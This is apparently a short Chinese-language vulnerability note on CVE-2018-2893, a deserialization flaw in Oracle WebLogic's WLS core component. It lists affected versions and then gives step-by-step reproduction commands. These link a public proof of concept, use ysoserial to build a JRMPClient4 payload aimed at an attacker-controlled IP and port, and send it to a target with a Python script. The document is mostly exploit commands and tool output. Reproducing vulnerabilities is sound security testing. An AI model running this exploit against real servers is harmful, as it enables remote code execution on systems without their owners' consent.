CVE-2018-2893 WebLogic WLS核心组件反序列化漏洞¶
一、漏洞简介¶
二、漏洞影响¶
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 12.1.3.0
Oracle WebLogic Server 12.2.1.2
Oracle WebLogic Server 12.2.1.3
三、复现过程¶
https://github.com/ianxtianxt/CVE-2018-2893
Step 1
java -jar ysoserial-cve-2018-2893.jar
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
JRMPClient @mbechler
JRMPClient2
JRMPClient3
JRMPClient4
Jdk7u21 @frohoff
Step 2
java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "<ip>:<port>" > poc4.ser
Step 3
python weblogic.py <host> <port> poc4.ser